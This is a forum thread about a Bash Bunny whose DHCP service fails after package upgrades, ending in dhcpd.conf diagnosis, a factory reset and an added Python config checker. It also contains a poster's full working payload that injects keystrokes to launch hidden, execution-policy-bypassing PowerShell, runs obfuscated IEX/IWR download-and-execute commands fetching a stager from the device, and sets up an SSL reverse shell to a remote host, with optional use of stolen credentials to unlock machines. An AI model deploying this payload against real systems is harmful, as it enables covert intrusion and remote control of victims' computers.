
Unable to get DHCP ip address from the bunny


catx0rr

So I was trying to test out my payload, and since it was hosted on the BB, I had to spin up a Python HTTP server. I also had to do the mount -o sync /dev/nandf /root/udisk in order to pull up the payload on the bunny.

The issue is I can't even SSH in to the Bash Bunny because it gives me an APIPA IP address (169.254...) on switch 1. Switch 2 seems to be fine, and it was stuck on 172.16.64.64 (where you have to set it for internet sharing).

Is there any other way to fix this, or to refresh/flush the network configuration?


Ethernet adapter Ethernet 7: (bashbunny switch 1)

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::f279:314a:12a0:7a90%26
   Autoconfiguration IPv4 Address. . : 169.254.220.6
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . :

Snippet, start of the payload, where it should go into RNDIS_ETHERNET and HID attack mode:

...<snip>...

# Prepare the bunny
LED M 250
ATTACKMODE RNDIS_ETHERNET HID

# Sync and mount drive to bashbunny
# wait for mounting before sourcing
mount -o sync /dev/nandf /root/udisk
sleep 5
# Sourcing extension dependencies:
# sourced scripts or helpers are stored in the shell session

SRC_DIR=/root/udisk/payloads/extensions/
source $SRC_DIR/get.sh
source $SRC_DIR/get2_dhclient.sh

GET SWITCH_POSITION

...<snip>...


Inside the switch1 directory these files reside:

.dev.log => (which are my notes for updating)

.gitignore => .dev.log

modules => a directory which is also sourced

payload.txt => the payload.txt

readme.txt => short description for the payload

Is the bunny reading it wrong? I was wondering if the readme.txt would affect the payload execution (mess it up) or whatever.


Update:

I was able to fix a couple of bugs (typo errors). So now, what I am trying to achieve is to get an IP from the bunny's DHCP. I am still getting an APIPA address (which is the major issue, as stated).

So the payload runs like this:

ATTACKMODE RNDIS_ETHERNET => should spin up its DHCP server and the host will acquire an IP (usually 172.16.64.1-10), but to no avail, I'm getting 169.254...
Then it sources get.sh and get2_dhclient.sh from the extensions directory, and:
GET TARGET_HOSTNAME => (but due to APIPA, it cannot)
GET TARGET_IP => (but due to APIPA, it cannot)
GET HOST_IP => it can get its own DHCP IP address.

Then it will spin up a Python HTTP server on port 80.
The host should download and execute a payload in memory from the server (the bunny).


Mounting the udisk that way isn't necessary, the easiest way is just to run
udisk mount

Sourcing the get commands shouldn't be necessary either; it's a part that's already taken care of by bunny_framework.

It's a lot easier to troubleshoot if the full payload is posted. Of course, if there is some super secret stuff in it, that can be left out, but just getting glimpses is just adding fog to the landscape.


Nothing super secret is included, just a bunch of automation commands in the main script, so I guess that should be fine.

I was able to fix the issues by debugging. The only issue I have is the DHCP server of the bunny. Just a recap, the usual behavior is that the host will acquire an IP from the bunny's DHCP, right? Then you may access the console by going to 172.16.64.1 (as usual).

Also, I was using an old Bash Bunny device (Mark I, I think) with the firmware updated to 1.6.

If the DHCP service has an issue, is there a way I can reconfigure it? I also updated the packages from the repository; you may wonder, I have python3 installed in it.

I just want to add as well that I tried internet sharing. Since then, the 172.16.64.64 IP was stuck on the host (in the case of switch 2) and APIPA on switch 1. Vice versa, when I put the payload on switch 2, it will get an APIPA IP and switch 1 will get the 172.16.64.64 IP (the DHCP automatically set IP address).

# Setup HID attack modules:
# User may have a different language keyboard
# setup ducky_lang script language here.
DUCKY_LANG=us
LED M 250
ATTACKMODE RNDIS_ETHERNET HID
 
# Sync and mount drive to bashbunny
# wait for mounting before sourcing
mount -o sync /dev/nandf /root/udisk
sleep 5
# Sourcing extension dependencies:
# sourced scripts or helpers are stored in the shell session
 
SRC_DIR=/root/udisk/payloads/extensions
source $SRC_DIR/get.sh
source $SRC_DIR/get2_dhclient.sh
 
GET SWITCH_POSITION
 
# Sourcing payload modules
 
MODULE_SRC=/root/udisk/payloads/$SWITCH_POSITION/modules
source $MODULE_SRC/logging.sh
source $MODULE_SRC/shellgen.sh
 
# Directory for local data dumps of the payload
# The default directory can bee seen upon connecting to bash bunny in
# arming mode or using serial or ssh connection.
 
LOG_DIR=/root/udisk/logs/
LOG_NAME="pwsh-ssl-debug.log"
 
# HTTP Server configuration
# In case that you needed to change the default port in serving the payload
HTTP_PORT=80
 
# Credentials:
# This can be enabled if you have obtained a valid
# plaintext credentials on the target host, or captured adomain account.
# This can be leveraged through lock computers and automatically unlock them
# when HID attack starts. Enable CREDENTIALS to 1 and supply creds to
# automate the attack.
 
CREDENTIALS=0
USERNAME=""
PASSWORD=""
 
# Domain or Workgroup:
# The target windows host might be domain joined or not, if not
# It may not be configured to enter username at lock/login screen.
# to not mess up the execution, configure the selected target here.
# If WORKGROUP is set to 0, the script will assume the target is a domain joined host.
# This option will only work if credentialed HID attack is set to 1. (above)
 
WORKGROUP=1
 
# Remote Host:
# Executes the payload and returns a callback to target remote host.
 
REMOTE_HOST="192.168.0.100"
REMOTE_PORT="443"
 
function setup_server()
{
  LED C 250
  # Go to module source path
  cd $MODULE_SRC
 
  LOGEVENT "$LOG_DIR" "$LOG_NAME" "Starting up services.."
 
  # Disallow outgoing DNS requests (bashbunny)
  iptables -A OUTPUT -p udp --dport 53 -j DROP; sleep 2
  LOGEVENT "$LOG_DIR" "$LOG_NAME" "Disabled udp port 53 for faster resolution.."
 
  # check if python3 is installed
  if [[ ! -f $(which python3) ]]; then
    LOGEVENT "$LOG_DIR" "$LOG_NAME" "Python3 is not installed. Aborting payload execution.."
    LED R 50; sleep 5
    LED R SOLID
    exit
  fi
 
  # execute HTTP server and wait for at least 3 seconds
  python3 -m http.server $HTTP_PORT &
  sleep 3
 
  # check for listening port
  if [[ $(netstat -plnt | grep $HTTP_PORT | awk {'print $6'}) == "LISTEN" ]]; then
    LOGEVENT "$LOG_DIR" "$LOG_NAME" "Python http server has successfully started.. Listening on port $HTTP_PORT.."
    LED C 50; sleep 3
    LED C SOLID
  else
    LOGEVENT "$LOG_DIR" "$LOG_NAME" "Python http server encountered an error.. Aborting payload execution.."
    LED R 50 ; sleep 5
    LED R SOLID
    exit
  fi
}
 
function create_payload()
{
  LED B 250 ; sleep 2
  LOGEVENT "$LOG_DIR" "$LOG_NAME" "Creating a unique ssl enabled reverse shell payload.."
  GENERATE_PAYLOAD "$REMOTE_HOST" "$REMOTE_PORT" "$MODULE_SRC" "$MODULE_SRC"
  # check for generated payload
  CHECK_PAYLOAD=$(ls | grep -E '^[a-z]{1}\.ps1$')
  if [[ $CHECK_PAYLOAD ]]; then
    # assign first, otherwise $PAYLOAD is still empty in the log messages below
    PAYLOAD=$CHECK_PAYLOAD
    LOGEVENT "$LOG_DIR" "$LOG_NAME" "Payload successfully created.. File stored in $MODULE_SRC/$PAYLOAD.."
    LOGEVENT "$LOG_DIR" "$LOG_NAME" "Payload has a md5 signature value of $(md5sum < "$MODULE_SRC/$PAYLOAD" | tr -d "-" | tr -d " " | tr -d "\n").."
    LED B 50 ; sleep 3
    LED B SOLID
  else
    LOGEVENT "$LOG_DIR" "$LOG_NAME" "Could not detect created payload.. Aborting HID attack.."
    LED R 50; sleep 5
    LED R SOLID
    exit
  fi
}
 
function start_hid_attack()
{
  LED Y 250 ; sleep 3
  LED Y 50 ; sleep 2
  # Get bb variables, setting up attack
  GET HOST_IP
  GET TARGET_IP
  GET TARGET_HOSTNAME
  sleep 2
  # Modify stager to point to the created payload
  sed -i "s/[a-z]\.ps1/$PAYLOAD/" $MODULE_SRC/stager.ps1
  sleep 2
  # Just ensure dynamic ip addressing set instead
  sed -i "s/[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}/$HOST_IP/" stager.ps1
  sleep 3
  LOGEVENT "$LOG_DIR" "$LOG_NAME" "Starting HID attack on the target host, $TARGET_HOSTNAME with an IP of ($TARGET_IP).."
 
  # Start DuckyScript HID attack (unlocked PC), executes stager and execute reverse shell (fileless)
  # Ensure that the listener on the remote host is already started.
  Q DELAY 1500
  Q GUI r
  Q DELAY 500
  Q STRING "pOwErShElL -NoP -nOLoGo -nONi -w h -eP bYpAsS"
  Q DELAY 300
  Q ENTER
  Q DELAY 500
  Q STRING "iE''x(i''W'R' -uRi ('h'+'ttp'+'://'+'$HOST_IP'+':$HTTP_PORT/stager.ps1'))"
  Q DELAY 300
  Q ENTER
  Q DELAY 500
  LOGEVENT "$LOG_DIR" "$LOG_NAME" "$PAYLOAD has been executed.. If properly configured, it should sucessfully created a ssl shell backdoor on the remote host ($REMOTE_HOST).."
  LED G 50; sleep 5
  LED G SOLID
}
 
function clean_up()
{
  LED W 50 ; sleep 5
  # Remove unique payload from the modules directory
  LOGEVENT "$LOG_DIR" "$LOG_NAME" "Cleaning up $PAYLOAD.. in $MODULE_SRC directory.."
  sleep 6
  sleep 2
  # DuckyScript commands need the Q prefix, a bare DELAY is not a shell command
  Q DELAY 1000
  Q GUI r
  Q DELAY 500
  Q STRING "pOwErShElL -NoP -nOLoGo -nONi -w h -eP bYpAsS"
  Q DELAY 300
  Q ENTER
  Q DELAY 500
  Q STRING "iE''x(i''W'R' -uRi ('h'+'ttp'+'://'+'$HOST_IP'+':$HTTP_PORT/cleanup.ps1'))"
  Q DELAY 300
  Q ENTER
  Q DELAY 500
  LOGEVENT "$LOG_DIR" "$LOG_NAME" "Successfully cleaned up attack..\n"
  sleep 7
  rm -rf $MODULE_SRC/$PAYLOAD
  # flush the udisk write before signalling completion
  sleep 2 ; sync ; sleep 1
  LED G SOLID
}
 
function main()
{
  setup_server
  create_payload
  start_hid_attack
  clean_up
}
 
main

Try creating a simple and small payload that just contains the following in order to rule out any other issues with the rest of your payload. I've never had any issues using the extensions and I just ran the payload below on a Win11 box and it was successful. If it isn't successful, then try it on other Windows machines if possible.

ATTACKMODE RNDIS_ETHERNET

LED ATTACK

GET SWITCH_POSITION
GET HOST_IP
GET TARGET_IP

echo $SWITCH_POSITION > /root/extensiontest.log
echo $HOST_IP >> /root/extensiontest.log
echo $TARGET_IP >> /root/extensiontest.log

LED FINISH

 



Thanks @dark_pyrro. Will try to check on this after I get back; just need to do some errands. Will update you in that regard.

Also, upon setting the IP to static (172.16.64.64), I was able to SSH in to the bunny and found this:

[screenshot]

Might be checking DHCP errors later.


I think I found the error in the DHCP config.

[screenshot]

So far as I can remember, I think this has to do with me updating the whole set of apt-upgrade packages and overwriting them with the Y/N configuration files, etc. Maybe there are no values in the dhcp conf or something, that's why. In case, can I request the default conf for the DHCP?


Here's the contents of /etc/dhcp/dhcpd.conf:

---------------------

root@bunny:/var/log# cat /etc/dhcp/dhcpd.conf
# dhcpd.conf
#
# Sample configuration file for ISC dhcpd
#

# option definitions common to all supported networks...
option domain-name "example.org";
option domain-name-servers ns1.example.org, ns2.example.org;

default-lease-time 600;
max-lease-time 7200;

# The ddns-updates-style parameter controls whether or not the server will
# attempt to do a DNS update when a lease is confirmed. We default to the
# behavior of the version 2 packages ('none', since DHCP v2 didn't
# have support for DDNS.)
ddns-update-style none;

# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
#authoritative;

# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
#log-facility local7;

# No service will be given on this subnet, but declaring it helps the
# DHCP server to understand the network topology.

#subnet 10.152.187.0 netmask 255.255.255.0 {
#}

# This is a very basic subnet declaration.

#subnet 10.254.239.0 netmask 255.255.255.224 {
#  range 10.254.239.10 10.254.239.20;
#  option routers rtr-239-0-1.example.org, rtr-239-0-2.example.org;
#}

# This declaration allows BOOTP clients to get dynamic addresses,
# which we don't really recommend.

#subnet 10.254.239.32 netmask 255.255.255.224 {
#  range dynamic-bootp 10.254.239.40 10.254.239.60;
#  option broadcast-address 10.254.239.31;
#  option routers rtr-239-32-1.example.org;
#}

# A slightly different configuration for an internal subnet.
#subnet 10.5.5.0 netmask 255.255.255.224 {
#  range 10.5.5.26 10.5.5.30;
#  option domain-name-servers ns1.internal.example.org;
#  option domain-name "internal.example.org";
#  option routers 10.5.5.1;
#  option broadcast-address 10.5.5.31;
#  default-lease-time 600;
#  max-lease-time 7200;
#}

# Hosts which require special configuration options can be listed in
# host statements.   If no address is specified, the address will be
# allocated dynamically (if possible), but the host-specific information
# will still come from the host declaration.

#host passacaglia {
#  hardware ethernet 0:0:c0:5d:bd:95;
#  filename "vmunix.passacaglia";
#  server-name "toccata.example.com";
#}

# Fixed IP addresses can also be specified for hosts.   These addresses
# should not also be listed as being available for dynamic assignment.
# Hosts for which fixed IP addresses have been specified can boot using
# BOOTP or DHCP.   Hosts for which no fixed address is specified can only
# be booted with DHCP, unless there is an address range on the subnet
# to which a BOOTP client is connected which has the dynamic-bootp flag
# set.
#host fantasia {
#  hardware ethernet 08:00:07:26:c0:a5;
#  fixed-address fantasia.example.com;
#}

# You can declare a class of clients and then do address allocation
# based on that.   The example below shows a case where all clients
# in a certain class get addresses on the 10.17.224/24 subnet, and all
# other clients get addresses on the 10.0.29/24 subnet.

#class "foo" {
#  match if substring (option vendor-class-identifier, 0, 4) = "SUNW";
#}

#shared-network 224-29 {
#  subnet 10.17.224.0 netmask 255.255.255.0 {
#    option routers rtr-224.example.org;
#  }
#  subnet 10.0.29.0 netmask 255.255.255.0 {
#    option routers rtr-29.example.org;
#  }
#  pool {
#    allow members of "foo";
#    range 10.17.224.10 10.17.224.250;
#  }
#  pool {
#    deny members of "foo";
#    range 10.0.29.10 10.0.29.230;
#  }
#}

---------------------------------------

And for dhclient.conf:

---------------------------------------

root@bunny:/var/log# cat /etc/dhcp/dhclient.conf
# Configuration file for /sbin/dhclient.
#
# This is a sample configuration file for dhclient. See dhclient.conf's
#       man page for more information about the syntax of this file
#       and a more comprehensive list of the parameters understood by
#       dhclient.
#
# Normally, if the DHCP server provides reasonable information and does
#       not leave anything out (like the domain name, for example), then
#       few changes must be made to this file, if any.
#

option rfc3442-classless-static-routes code 121 = array of unsigned integer 8;

send host-name = gethostname();
request subnet-mask, broadcast-address, time-offset, routers,
        domain-name, domain-name-servers, domain-search, host-name,
        dhcp6.name-servers, dhcp6.domain-search, dhcp6.fqdn, dhcp6.sntp-servers,
        netbios-name-servers, netbios-scope, interface-mtu,
        rfc3442-classless-static-routes, ntp-servers;

#send dhcp-client-identifier 1:0:a0:24:ab:fb:9c;
#send dhcp-lease-time 3600;
#supersede domain-name "fugue.com home.vix.com";
#prepend domain-name-servers 127.0.0.1;
#require subnet-mask, domain-name-servers;
#timeout 60;
#retry 60;
#reboot 10;
#select-timeout 5;
#initial-interval 2;
#script "/sbin/dhclient-script";
#media "-link0 -link1 -link2", "link0 link1";
#reject 192.33.137.209;

#alias {
#  interface "eth0";
#  fixed-address 192.5.5.213;
#  option subnet-mask 255.255.255.255;
#}

#lease {
#  interface "eth0";
#  fixed-address 192.33.137.200;
#  medium "link0 link1";
#  option host-name "andare.swiftmedia.com";
#  option subnet-mask 255.255.255.0;
#  option broadcast-address 192.33.137.255;
#  option routers 192.33.137.250;
#  option domain-name-servers 127.0.0.1;
#  renew 2 2000/1/12 00:00:01;
#  rebind 2 2000/1/12 00:00:01;
#  expire 2 2000/1/12 00:00:01;
#}
root@bunny:/var/log#

-----------------------------------


@dark_pyrro, hey thanks. I think the .conf file could restore the DHCP config by just adding the configuration below. The service is failing because, I assume, it was misconfigured and the bunny defaults were looking in the dhcpd.conf file for the subnet range it needs in order to work properly. We could have tried that at least, but it was fixed by the factory reset, also done with a firmware update. It's just that I lost all the apt packages and upgrades on the bunny. Still, the main thing is it was all sorted out, and I can work over here. Thanks again.

The only part that I might have needed to add to dhcpd.conf:

[screenshot]

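The failure described in the last two posts (a stock ISC sample dhcpd.conf in which every subnet declaration is commented out, and the 172.16.64.0/24 stanza that had to be added back) can be checked offline before touching the service. The script below is an added example, not Hak5 code or anything posted in the thread: it parses the active subnet and range declarations of a dhcpd.conf and reports whether the address dhcpd is supposed to serve (172.16.64.1 for the bunny's RNDIS interface, the console address named above) is covered by a usable subnet. STOCK_SAMPLE_CONF is a constructed excerpt of the file pasted above; the BUNNY_STANZA_CONF stanza and its range values are assumptions, not the shipped configuration, and BAD_RANGE_CONF is a constructed misconfiguration.

```python
"""Check whether an ISC dhcpd.conf declares a usable subnet for the address
dhcpd is expected to serve.  Added example, not Hak5 code; the Bash Bunny
stanza below is an assumption, not the shipped configuration."""
import ipaddress
import re

# Constructed excerpt of the stock ISC sample dhcpd.conf shown in the thread:
# every subnet declaration is commented out, so nothing is actually served.
STOCK_SAMPLE_CONF = """
option domain-name "example.org";
default-lease-time 600;
max-lease-time 7200;
ddns-update-style none;

#subnet 10.254.239.0 netmask 255.255.255.224 {
#  range 10.254.239.10 10.254.239.20;
#  option routers rtr-239-0-1.example.org, rtr-239-0-2.example.org;
#}
"""

# Assumed stanza for the bunny's 172.16.64.0/24 network (constructed): the
# bunny itself is 172.16.64.1 and hosts lease from a small range above it.
BUNNY_STANZA_CONF = """
subnet 172.16.64.0 netmask 255.255.255.0 {
  range 172.16.64.10 172.16.64.12;
  option routers 172.16.64.1;
  option domain-name-servers 172.16.64.1;
}
"""

# Constructed misconfiguration: subnet declared, but the range lies outside it.
BAD_RANGE_CONF = """
subnet 172.16.64.0 netmask 255.255.255.0 {
  range 172.16.65.10 172.16.65.12;
}
"""

IPV4 = r"\d{1,3}(?:\.\d{1,3}){3}"
SUBNET_RE = re.compile(r"subnet\s+(" + IPV4 + r")\s+netmask\s+(" + IPV4 + r")\s*\{")
RANGE_RE = re.compile(r"range\s+(?:dynamic-bootp\s+)?(" + IPV4 + r")(?:\s+(" + IPV4 + r"))?\s*;")


def strip_comments(text):
    """Drop '#' comments so commented-out sample stanzas do not count.
    Good enough for the stock file; does not handle '#' inside quoted strings."""
    return "\n".join(line.split("#", 1)[0] for line in text.splitlines())


def _block_body(text, open_brace_end):
    """Return the text between the '{' ending at open_brace_end and its matching '}'."""
    depth, i = 1, open_brace_end
    while i < len(text) and depth > 0:
        if text[i] == "{":
            depth += 1
        elif text[i] == "}":
            depth -= 1
        i += 1
    return text[open_brace_end:i - 1]


def declared_subnets(conf_text):
    """Parse active subnet blocks into [(network, [(first, last), ...]), ...]."""
    text = strip_comments(conf_text)
    subnets = []
    for m in SUBNET_RE.finditer(text):
        net = ipaddress.ip_network(m.group(1) + "/" + m.group(2), strict=False)
        ranges = []
        for r in RANGE_RE.finditer(_block_body(text, m.end())):
            first = ipaddress.ip_address(r.group(1))
            last = ipaddress.ip_address(r.group(2) or r.group(1))
            ranges.append((first, last))
        subnets.append((net, ranges))
    return subnets


def check_interface(conf_text, iface_ip):
    """Return (ok, reason).  ok is False when dhcpd would hand out no leases on
    the network iface_ip sits on, which is when a Windows host on that link
    falls back to a 169.254.x.x APIPA address."""
    ip = ipaddress.ip_address(iface_ip)
    for net, ranges in declared_subnets(conf_text):
        if ip not in net:
            continue
        if not ranges:
            return False, "subnet %s is declared but has no range, so no leases" % net
        for first, last in ranges:
            if first not in net or last not in net:
                return False, "range %s-%s is not on net %s" % (first, last, net)
        return True, "%s is covered by subnet %s with %d range(s)" % (ip, net, len(ranges))
    return False, "no subnet declaration covers %s; dhcpd ignores that interface" % ip


if __name__ == "__main__":
    for name, conf in [("stock sample", STOCK_SAMPLE_CONF),
                       ("bunny stanza", BUNNY_STANZA_CONF),
                       ("bad range", BAD_RANGE_CONF)]:
        ok, reason = check_interface(conf, "172.16.64.1")
        print("%-12s %s: %s" % (name, "OK  " if ok else "FAIL", reason))
```

Against the live file, call check_interface(open("/etc/dhcp/dhcpd.conf").read(), "172.16.64.1") on the bunny. The check mirrors how ISC dhcpd itself behaves: an interface whose address matches no subnet declaration is ignored with a "No subnet declaration" message, and the daemon exits when it has no interface left to listen on, which leaves the Windows side with an APIPA address exactly as in the ipconfig output at the top of the thread. The daemon's own syntax check, dhcpd -t -cf /etc/dhcp/dhcpd.conf, and the service log remain the authoritative place to confirm the diagnosis.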

Archived

This topic is now archived and is closed to further replies.
